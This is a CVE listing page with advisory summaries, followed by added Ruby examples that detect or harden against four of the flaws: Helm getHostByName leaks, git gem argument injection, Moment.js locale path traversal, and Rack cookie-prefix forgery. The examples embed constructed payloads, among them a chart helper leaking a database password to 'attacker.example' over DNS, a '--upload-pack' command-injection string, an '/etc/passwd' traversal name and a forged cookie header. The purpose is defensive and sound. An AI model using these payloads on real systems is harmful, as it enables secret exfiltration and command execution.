Total: 210374 CVE
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description |
---|---|---|---|---|---|---|
CVE-2022-48300 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH | The WMS module lacks the authentication mechanism in some APIs. Successful exploitation of this vulnerability may affect data confidentiality. |
CVE-2023-25165 | 1 Helm | 1 Helm | 2023-02-16 | N/A | 4.3 MEDIUM | Helm is a tool that streamlines installing and managing Kubernetes applications. `getHostByName` is a Helm template function introduced in Helm v3. The function is able to accept a hostname and return an IP address for that hostname. To get the IP address the function performs a DNS lookup. The DNS lookup happens when used with `helm install\|upgrade\|template` or when the Helm SDK is used to render a chart. Information passed into the chart can be disclosed to the DNS servers used to lookup the IP address. For example, a malicious chart could inject `getHostByName` into a chart in order to disclose values to a malicious DNS server. The issue has been fixed in Helm 3.11.1. Prior to using a chart with Helm verify the `getHostByName` function is not being used in a template to disclose any information you do not want passed to DNS servers. |
CVE-2022-48298 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH | The geofencing kernel code does not verify the length of the input data. Successful exploitation of this vulnerability may cause out-of-bounds memory access. |
CVE-2023-25166 | 1 Hapi | 1 Formula | 2023-02-16 | N/A | 6.5 MEDIUM | formula is a math and string formula parser. In versions prior to 3.0.1, crafted user-provided strings to formula's parser might lead to polynomial execution time and a denial of service. Users should upgrade to 3.0.1+. There are no known workarounds for this vulnerability. |
CVE-2022-48297 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH | The geofencing kernel code has a vulnerability of not verifying the length of the input data. Successful exploitation of this vulnerability may cause out-of-bounds memory access. |
CVE-2022-48302 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH | The AMS module has a vulnerability of lacking permission verification in APIs. Successful exploitation of this vulnerability may affect data confidentiality. |
CVE-2022-38778 | 2 Decode-uri-component Project, Elastic | 2 Decode-uri-component, Kibana | 2023-02-16 | N/A | 6.5 MEDIUM | A flaw (CVE-2022-38900) was discovered in one of Kibana’s third-party dependencies that could allow an authenticated user to perform a request that crashes the Kibana server process. |
CVE-2022-45982 | 1 Thinkphp | 1 Thinkphp | 2023-02-16 | N/A | 9.8 CRITICAL | thinkphp 6.0.0~6.0.13 and 6.1.0~6.1.1 contain a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload. |
CVE-2022-48299 | 1 Huawei | 2 Emui, Harmonyos | 2023-02-16 | N/A | 7.5 HIGH | The WMS module lacks the authentication mechanism in some APIs. Successful exploitation of this vulnerability may affect data confidentiality. |
CVE-2020-22669 | 2 Debian, Owasp | 2 Debian Linux, Owasp Modsecurity Core Rule Set | 2023-02-16 | N/A | 9.8 CRITICAL | Modsecurity owasp-modsecurity-crs 3.2.0 (Paranoia level at PL1) has a SQL injection bypass vulnerability. Attackers can use the comment characters and variable assignments in the SQL syntax to bypass Modsecurity WAF protection and implement SQL injection attacks on Web applications. |
CVE-2022-26117 | 1 Fortinet | 1 Fortinac | 2023-02-16 | N/A | 8.8 HIGH | An empty password in configuration file vulnerability [CWE-258] in FortiNAC version 8.3.7 and below, 8.5.2 and below, 8.5.4, 8.6.0, 8.6.5 and below, 8.7.6 and below, 8.8.11 and below, 9.1.5 and below, 9.2.3 and below may allow an authenticated attacker to access the MySQL databases via the CLI. |
CVE-2022-25648 | 3 Debian, Fedoraproject, Git | 4 Debian Linux, Extra Packages For Enterprise Linux, Fedora and 1 more | 2023-02-16 | 7.5 HIGH | 9.8 CRITICAL | The package git before 1.11.0 is vulnerable to Command Injection via git argument injection. When calling the fetch(remote = 'origin', opts = {}) function, the remote parameter is passed to the git fetch subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection. |
CVE-2022-24785 | 5 Debian, Fedoraproject, Momentjs and 2 more | 5 Debian Linux, Fedora, Moment and 2 more | 2023-02-16 | 5.0 MEDIUM | 7.5 HIGH | Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js. |
CVE-2021-35368 | 3 Debian, Fedoraproject, Owasp | 3 Debian Linux, Fedora, Owasp Modsecurity Core Rule Set | 2023-02-16 | 7.5 HIGH | 9.8 CRITICAL | OWASP ModSecurity Core Rule Set 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.2 is affected by a Request Body Bypass via a trailing pathname. |
CVE-2023-24322 | 1 Mojoportal | 1 Mojoportal | 2023-02-16 | N/A | 6.1 MEDIUM | A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters. |
CVE-2020-8184 | 3 Canonical, Debian, Rack Project | 3 Ubuntu Linux, Debian Linux, Rack | 2023-02-16 | 5.0 MEDIUM | 7.5 HIGH | A reliance on cookies without validation/integrity check security vulnerability exists in rack < 2.2.3, rack < 2.1.4 that makes it possible for an attacker to forge a secure or host-only cookie prefix. |
CVE-2019-13223 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 4.3 MEDIUM | 5.5 MEDIUM | A reachable assertion in the lookup1_values function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file. |
CVE-2019-13222 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 5.8 MEDIUM | 7.1 HIGH | An out-of-bounds read of a global buffer in the draw_line function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or disclose sensitive information by opening a crafted Ogg Vorbis file. |
CVE-2019-13221 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 6.8 MEDIUM | 7.8 HIGH | A stack buffer overflow in the compute_codewords function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or execute arbitrary code by opening a crafted Ogg Vorbis file. |
CVE-2019-13220 | 2 Debian, Stb Vorbis Project | 2 Debian Linux, Stb Vorbis | 2023-02-16 | 5.8 MEDIUM | 7.1 HIGH | Use of uninitialized stack variables in the start_decoder function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or disclose sensitive information by opening a crafted Ogg Vorbis file. |
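The Helm advisory (CVE-2023-25165) tells you to verify that `getHostByName` is not used in a chart's templates before rendering it. The following is an added example of that pre-install check, written here and not taken from Helm or from the page; it scans template sources for Go-template actions that call `getHostByName`, including actions that span lines. The sample chart embedded at the bottom is constructed for the demonstration, and the assumed on-disk layout (`templates/` plus `values*.yaml`) is the standard one.

```ruby
# Added example (not Helm's own code): scan a chart's template sources for uses of
# the getHostByName template function before the chart is rendered or installed.
# It looks inside Go-template actions ({{ ... }}), which may span lines, and reports
# file, line and the action text so a reviewer can see which value would reach DNS.

GET_HOST_BY_NAME_ACTION = /\{\{(?:(?!\}\}).)*?\bgetHostByName\b.*?\}\}/m

# files: Hash of relative path => file content (templates/*.yaml, _helpers.tpl, ...).
# Returns an Array of findings: { path:, line:, action: }.
def scan_helm_templates(files)
  findings = []
  files.each do |path, content|
    pos = 0
    while (m = GET_HOST_BY_NAME_ACTION.match(content, pos))
      line = content[0...m.begin(0)].count("\n") + 1
      findings << { path: path, line: line, action: m[0].gsub(/\s+/, " ") }
      pos = m.end(0)
    end
  end
  findings
end

# Convenience wrapper for a chart directory on disk. It also scans values files,
# because content rendered through `tpl` can carry template actions too
# (assumption: the standard chart layout with templates/ and values*.yaml).
def scan_helm_chart_dir(chart_dir)
  paths = Dir.glob(File.join(chart_dir, "templates", "**", "*")).select { |p| File.file?(p) }
  paths += Dir.glob(File.join(chart_dir, "values*.yaml"))
  files = paths.to_h { |p| [p.delete_prefix("#{chart_dir}/"), File.read(p)] }
  scan_helm_templates(files)
end

# Constructed sample chart, not a real one: a benign template and a helper that
# pipes a secret value through getHostByName, which would leak it in a DNS query.
SAMPLE_CHART = {
  "templates/service.yaml" => <<~YAML,
    apiVersion: v1
    kind: Service
    metadata:
      name: {{ .Release.Name }}-svc
  YAML
  "templates/_helpers.tpl" => <<~TPL,
    {{- define "chart.resolve" -}}
    {{ printf "%s.%s" .Values.db.password "attacker.example" | getHostByName }}
    {{- end -}}
  TPL
}

if __FILE__ == $PROGRAM_NAME
  scan_helm_templates(SAMPLE_CHART).each do |f|
    puts "#{f[:path]}:#{f[:line]}: #{f[:action]}"
  end
end
```

Run `scan_helm_chart_dir("path/to/chart")` against an unpacked chart and treat any finding as a blocker until a human has read the action. The check is deliberately conservative: a `getHostByName` inside a `{{/* ... */}}` comment is also reported, which is cheaper than missing one. Scanning the rendered output of `helm template` would not work for this purpose, because the function call is gone by the time the manifest is produced.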
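CVE-2022-25648 describes the remote name reaching `git fetch` "in a way that additional flags can be set". The block below is an added example, written here rather than taken from the `git` gem (assumed to be the Ruby gem, given the `fetch(remote = 'origin', opts = {})` signature quoted on the page): it builds the argv the vulnerable shape produces, beside a hardened builder that refuses option-looking and otherwise malformed remote names. The `:all` and `:tags` option keys, the character allowlist and the `--upload-pack` payload are illustrative assumptions; nothing here executes git.

```ruby
# Added example, not the git gem's own code: show how a caller-controlled remote
# name turns into a git option when it is appended to the argv unchecked, and a
# hardened builder that refuses such names. Nothing here executes git; both
# functions return the argv array so the difference is visible.

class UnsafeRemoteName < ArgumentError; end

# Mirrors the shape of the vulnerable call: fetch(remote = 'origin', opts = {}).
# The option keys (:all, :tags) are assumed for illustration.
def fetch_argv_vulnerable(remote = "origin", opts = {})
  argv = ["git", "fetch"]
  argv << "--all" if opts[:all]
  argv << "--tags" if opts[:tags]
  argv << remote          # "--upload-pack=<cmd>" lands here and git treats it as a flag
  argv
end

# Conservative shape for a remote name or fetch URL: starts with an alphanumeric
# character (so never "-"), no whitespace or control characters, and only the
# characters common in remote names and git/ssh/https URLs. This is an assumption;
# widen it deliberately if your remotes need more (e.g. "?" or "%" in URLs).
REMOTE_NAME_OK = /\A[A-Za-z0-9][A-Za-z0-9._\-\/:@~+]*\z/

def fetch_argv_hardened(remote = "origin", opts = {})
  raise UnsafeRemoteName, "remote looks like an option: #{remote.inspect}" if remote.start_with?("-")
  raise UnsafeRemoteName, "remote contains whitespace or control characters" if remote.match?(/[[:space:][:cntrl:]]/)
  raise UnsafeRemoteName, "remote has unexpected characters: #{remote.inspect}" unless REMOTE_NAME_OK.match?(remote)
  argv = ["git", "fetch"]
  argv << "--all" if opts[:all]
  argv << "--tags" if opts[:tags]
  argv << remote
  argv
end

# Returns true when the hardened builder rejects a remote that the vulnerable one
# would have passed straight through to git.
def injection_blocked?(remote)
  fetch_argv_hardened(remote)
  false
rescue UnsafeRemoteName
  fetch_argv_vulnerable(remote).include?(remote)
end

if __FILE__ == $PROGRAM_NAME
  payload = "--upload-pack=touch /tmp/pwned"   # constructed payload for illustration
  p fetch_argv_vulnerable(payload)              # payload sits in option position
  p injection_blocked?(payload)
end
```

When the argv is finally executed, keep it as an array (`system(*argv)` or `Open3.capture3(*argv)`), never joined into one string, so the shell is not a second injection surface. On Git versions that support `--end-of-options`, inserting it before the remote is an additional guard at git's own option parser; that flag is a Git feature, not something the advisory mentions.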
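The Moment.js entry (CVE-2022-24785) recommends sanitizing a user-provided locale name before it is used to switch locale, because on the server that name becomes part of a file path. This added example, written here in Ruby to keep one language across the page and not taken from Moment.js, shows the two layers a practitioner would want: an allowlist on the name, optionally tightened to the locales actually installed, and a containment check on the resolved path so that traversal is refused even if the name check is bypassed. The locale-name shape, the `.js`-per-locale layout and the sample directory path are assumptions.

```ruby
# Added example, not Moment.js code: validate a user-supplied locale name before a
# library maps it onto a file path. Two independent layers: an allowlist on the
# name itself, and a containment check on the resolved path.

# Locale keys of the form "en", "en-gb", "zh-cn", "de-at": lowercase, hyphenated.
# The shape is an assumption; the `known` list is the stronger check.
LOCALE_NAME = /\A[a-z]{2,3}(?:-[a-z0-9]{2,8})*\z/

# Normalise the way a lenient library would (lowercase, "_" to "-"), then accept
# only names matching the allowlist shape and, when given, the set of locales
# actually installed. Returns the normalised name, or nil to reject.
def sanitize_locale(name, known = nil)
  return nil unless name.is_a?(String)
  candidate = name.strip.downcase.tr("_", "-")
  return nil unless LOCALE_NAME.match?(candidate)
  return nil if known && !known.include?(candidate)
  candidate
end

# Build the `known` list from the locale directory on disk (assumed: one .js per locale).
def installed_locales(locale_dir)
  Dir.glob(File.join(locale_dir, "*.js")).map { |p| File.basename(p, ".js") }
end

# Defence in depth for any "name becomes a file" lookup: resolve the path and
# confirm it is still inside the locale directory. Catches "../", absolute
# paths and "en-gb/../../x" even if the name check above is bypassed or omitted.
def locale_file_path(locale_dir, name)
  base = File.expand_path(locale_dir)
  path = File.expand_path("#{name}.js", base)
  return nil unless path.start_with?(base + File::SEPARATOR)
  path
end

# Both layers together: the locale file to load, or nil when the request is refused.
def resolve_locale(locale_dir, name, known = nil)
  clean = sanitize_locale(name, known)
  clean && locale_file_path(locale_dir, clean)
end

if __FILE__ == $PROGRAM_NAME
  base = "/app/node_modules/moment/locale"   # assumed path for the demonstration
  ["en-GB", "../../../../etc/passwd", "/etc/passwd", "en-gb/../../moment"].each do |n|
    puts "#{n.inspect} => #{resolve_locale(base, n).inspect}"
  end
end
```

The same shape applies to any library that builds a require or open path from a user-controlled identifier; the allowlist is what stops the request, and the containment check is what tells you the allowlist was not enough.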
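The Rack entry (CVE-2020-8184) is about forging a `__Secure-`/`__Host-` cookie prefix. Browsers enforce the prefix rules on the raw cookie name, so a name sent as `%5F%5FHost-session` passes them; a server-side parser that percent-decodes cookie names then sees `__Host-session`. The following is an added example written here, not Rack's code: a lenient parser that decodes names (the behaviour the advisory describes) beside a hardened one that keeps names verbatim, and a check that trusts the prefix. Keeping the name undecoded is the fix I would apply; whether it matches Rack's own patch line for line is not something this page states. The attacker header is constructed.

```ruby
# Added example, not Rack's code: a cookie-header parser that percent-decodes cookie
# names beside one that keeps names verbatim, and a prefix check that only the
# second one keeps honest.
require "uri"

def unescape(s)
  URI.decode_www_form_component(s)
rescue ArgumentError
  s
end

# Lenient parser: decodes both name and value. A browser sends
# "%5F%5FHost-session=..." without complaint, because the raw name does not start
# with "__" so the browser's own prefix rules never apply; after decoding, the
# server sees "__Host-session" and may treat it as a cookie that could only have
# been set from this host over HTTPS, with Path=/ and no Domain attribute.
def parse_cookies_lenient(header)
  cookies = {}
  header.to_s.split(/;\s*/).each do |pair|
    next if pair.empty?
    name, value = pair.split("=", 2)
    name = unescape(name)
    cookies[name] ||= unescape(value.to_s)
  end
  cookies
end

# Hardened parser: the name is taken exactly as sent; only the value is decoded.
def parse_cookies_hardened(header)
  cookies = {}
  header.to_s.split(/;\s*/).each do |pair|
    next if pair.empty?
    name, value = pair.split("=", 2)
    cookies[name] ||= unescape(value.to_s)
  end
  cookies
end

# Application logic that relies on the __Host- prefix, e.g. to decide that a
# session cookie was set by this origin and not by a sibling subdomain.
def host_session(cookies)
  cookies["__Host-session"]
end

# Constructed attacker header: what a sibling subdomain, or any injection point
# that can set a cookie name, could make the browser send to the target.
ATTACK_HEADER = "%5F%5FHost-session=attacker-chosen; theme=dark".freeze

if __FILE__ == $PROGRAM_NAME
  puts "lenient:  #{host_session(parse_cookies_lenient(ATTACK_HEADER)).inspect}"
  puts "hardened: #{host_session(parse_cookies_hardened(ATTACK_HEADER)).inspect}"
end
```

The hardened parser still percent-decodes values, which is what applications expect; it is only the name that must be compared byte for byte with what the browser sent, because that is the string the browser applied the prefix rules to.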